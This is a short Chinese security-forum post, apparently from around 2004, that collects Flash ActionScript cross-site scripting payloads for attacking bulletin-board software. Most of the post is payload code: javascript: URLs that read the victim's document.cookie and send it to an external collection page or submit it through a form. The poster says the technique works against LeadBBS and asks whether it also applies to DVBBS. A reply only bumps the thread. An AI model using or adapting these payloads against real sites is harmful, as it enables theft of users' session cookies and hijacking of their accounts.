|
作者: q70213526 [q70213526] 版主 | 登录 |
http://www.donews.net/uiokyu/archive/2004/08/27/80564.aspx Flash 跨站脚本攻击资料整理 sandflee的LIlo编写的:感谢灰色小虫提供 这是一个FLash的action script PUrl="瓜瓦 script:var oSel =document.selection.createRange();var iUs='http://***.org/demo1/Post.asp?mm='+documents.cookie.split('&');oSel.pasteHTML('');" getURL(PUrl); LILo给我的另一个: PUrl="瓜瓦 script:var oSel =document.selection.createRange();oSel.pasteHTML(' ');mForm.mm.value=documents.cookie;mForm.submit();" getURL(PUrl); 我写的 利用了一个洞洞swf?">.........不弹框框 ">点击浏览该文件 此法是否可应用于DVBBS??? 对于已经可以发flash、音乐和视频的leadbbs攻击有效果。 |
地主 发表时间: 04-11-06 11:31 |
回复: q70213526 [q70213526] 版主 | 登录 |
顶一下 没人回答? |
B1层 发表时间: 00-01-01 01:55 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号